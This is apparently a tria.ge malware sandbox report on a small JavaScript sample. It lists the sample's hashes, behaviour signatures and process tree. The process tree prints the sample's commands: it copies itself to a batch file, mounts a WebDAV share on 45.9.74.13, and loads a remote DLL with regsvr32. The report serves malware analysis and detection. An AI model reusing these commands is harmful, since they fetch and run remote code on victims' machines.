Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 06:12
Static task
static1
Behavioral task
behavioral1
Sample
3184579182140121556.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3184579182140121556.js
Resource
win10v2004-20240704-en
General
-
Target
3184579182140121556.js
-
Size
5KB
-
MD5
a3a26691f23f506be74e72a6dc740959
-
SHA1
68d5263d0ffbec81e72c555a2f5a1ff911229676
-
SHA256
accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba
-
SHA512
0a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e
-
SSDEEP
96:b4EpzOOolLhgcjGhsmF5lBJ2aIhD7lA+qnkz:EI4ltgcj0sS5lBJ2aIhD7lA3nkz
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2588 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2524 wrote to memory of 2876 2524 wscript.exe 30 PID 2524 wrote to memory of 2876 2524 wscript.exe 30 PID 2524 wrote to memory of 2876 2524 wscript.exe 30 PID 2876 wrote to memory of 2728 2876 cmd.exe 32 PID 2876 wrote to memory of 2728 2876 cmd.exe 32 PID 2876 wrote to memory of 2728 2876 cmd.exe 32 PID 2876 wrote to memory of 2588 2876 cmd.exe 33 PID 2876 wrote to memory of 2588 2876 cmd.exe 33 PID 2876 wrote to memory of 2588 2876 cmd.exe 33 PID 2876 wrote to memory of 2588 2876 cmd.exe 33 PID 2876 wrote to memory of 2588 2876 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3184579182140121556.js" "C:\Users\Admin\\lbdupt.bat" && "C:\Users\Admin\\lbdupt.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2728
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\890.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2588
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5a3a26691f23f506be74e72a6dc740959
SHA168d5263d0ffbec81e72c555a2f5a1ff911229676
SHA256accbf5224b6054b92773326c22c560eec52d5302536bf9809c62810f59694fba
SHA5120a5e694d359b435548fe328bfe472115c8bd5a423ba35f4eb905f30f50959c8a8770388902bd642401bdba38916a16cfed68ac40a573629b8f9f99e66b71370e